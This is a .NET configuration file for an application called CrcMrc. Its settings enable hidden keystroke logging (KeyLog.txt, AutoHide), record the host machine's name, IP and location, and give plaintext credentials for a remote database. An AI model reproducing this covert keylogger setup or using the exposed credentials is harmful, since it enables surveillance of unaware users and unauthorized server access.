<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <sectionGroup name="applicationSettings" type="System.Configuration.ApplicationSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
      <section name="CrcMrc.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false"/>
    </sectionGroup>
  </configSections>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/>
  </startup>
  <applicationSettings>
    <CrcMrc.Properties.Settings>
        <setting name="TickTime" serializeAs="String">
            <value>9000</value>
        </setting>
        <setting name="ComputerName" serializeAs="String">
            <value>none</value>
        </setting>
        <setting name="ComputerIP" serializeAs="String">
            <value>none</value>
        </setting>
        <setting name="ComputerLocation" serializeAs="String">
            <value>none</value>
        </setting>
        <setting name="FileName" serializeAs="String">
            <value>KeyLog.txt</value>
        </setting>
        <setting name="TickKeyboardTime" serializeAs="String">
            <value>400</value>
        </setting>
        <setting name="CounterKey" serializeAs="String">
            <value>300</value>
        </setting>
        <setting name="dbServer" serializeAs="String">
            <value>159.69.113.252</value>
        </setting>
        <setting name="dbName" serializeAs="String">
            <value>kapluspl_crc</value>
        </setting>
        <setting name="dbUser" serializeAs="String">
            <value>maniac</value>
        </setting>
        <setting name="dbPsw" serializeAs="String">
            <value>F3VA55TpNfsA</value>
        </setting>
        <setting name="dbTime" serializeAs="String">
            <value>60000</value>
        </setting>
        <setting name="FileDB" serializeAs="String">
            <value>temp.xml</value>
        </setting>
        <setting name="FileLOG" serializeAs="String">
            <value>control.txt</value>
        </setting>
        <setting name="CPUUseSwitch" serializeAs="String">
            <value>False</value>
        </setting>
        <setting name="Log_KeyLogger" serializeAs="String">
            <value>True</value>
        </setting>
        <setting name="Log_Command" serializeAs="String">
            <value>False</value>
        </setting>
        <setting name="AutoHide" serializeAs="String">
            <value>True</value>
        </setting>
    </CrcMrc.Properties.Settings>
  </applicationSettings>
</configuration>
